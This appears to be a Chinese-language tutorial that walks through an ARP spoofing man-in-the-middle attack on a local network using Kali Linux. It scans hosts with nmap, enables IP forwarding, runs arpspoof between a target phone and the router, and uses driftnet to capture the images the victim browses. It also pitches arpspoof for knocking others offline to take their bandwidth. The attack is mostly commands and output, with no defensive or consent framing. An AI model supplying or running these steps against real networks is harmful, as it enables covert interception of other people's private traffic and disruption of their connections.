前言:
Arpspoof是一个截发包工具,能够用来进行局域网内部的欺骗,方便用户开启arp断网攻击,抢占网速。
Driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。该工具可以实时和离线捕获指定数据包中是图片,当然在kali里是有的。
1,使用nmap扫描该网段存活主机
# nmap -sP 192.168.1.100/24
Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-15 22:18 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0089s latency).
MAC Address: D8:15:0D:EF:57:D6 (Tp-link Technologies)
Nmap scan report for 192.168.1.100
Host is up (0.0040s latency).
MAC Address: 8C:F2:28:AA:CE:23 (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.1.102
Host is up (0.032s latency).
MAC Address: 04:15:52:12:69:8F (Apple)
Nmap scan report for 192.168.1.104
Host is up (0.12s latency).
MAC Address: 60:F8:1D:8A:15:DB (Apple)
Nmap scan report for 192.168.1.111
Host is up (0.024s latency).
MAC Address: 50:7A:55:2A:33:15 (Apple)
Nmap scan report for 192.168.1.114
Host is up (0.23s latency).
MAC Address: 9C:99:A0:48:99:51 (Xiaomi Communications)
Nmap scan report for 192.168.1.116
Host is up (0.10s latency).
MAC Address: 54:E4:3A:E0:FA:78 (Apple)
Nmap scan report for 192.168.1.118
Host is up (0.017s latency).
MAC Address: 2A:F7:6A:40:4D:78 (Unknown)
Nmap scan report for 192.168.1.123
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 6.07 seconds
2,在kali系统开启路由转发功能
# echo “1”> /proc/sys/net/ipv4/ip_forward
3,找到要嗅探的手机ip,进行arp欺骗。将主机192.168.1.106发送给192.168.1.1的数据包先发送给kali主机,再由主机转发。
# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1
4,将路由器发回给192.168.1.106主机的数据包先发给kali主机,再由本机转发。
# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.106
5,使用dirftnet进程监控,然后会弹出一个监控框,接着在手机上浏览网页,就会显示出目标主机浏览的图片。
# driftnet -i wlan0
/tmp/drifnet-UIsrmU 默认的图片都会保存在该位置。
# driftnet -help 查看dirftnet相关参数
driftnet, version 1.1.5
Capture images from network traffic and display them in an X window.
Synopsis: driftnet [options] [filter code]
Options:
-h Display this help message.
-v Verbose operation.
-b Beep when a new image is captured.
-i interface Select the interface on which to listen (default: allinterfaces).
-f file Instead of listening on an interface, read captured
packets from a pcap dump file; file can be a named pipe for use with Kismet or similar.
-p Do not put the listening interface into promiscuous mode.
-a Adjunct mode: do not display images on screen, but save
them to a temporary directory and announce their names on
standard output.
-m number Maximum number of images to keep in temporary directory in adjunct mode.
-d directory Use the named temporary directory.
-x prefix Prefix to use when saving images.
-s Attempt to extract streamed audio data from the network,
in addition to images. At present this supports MPEG data
only.
-S Extract streamed audio but not images.
-M command Use the given command to play MPEG audio data extracted
with the -s option; this should process MPEG frames
supplied on standard input. Default: `mpg123 -‘.
Sun May 15 22:21:36 2016 [driftnet]
warning: image data too small (49 bytes) to bother with,图片字节数小于49将不会显示。
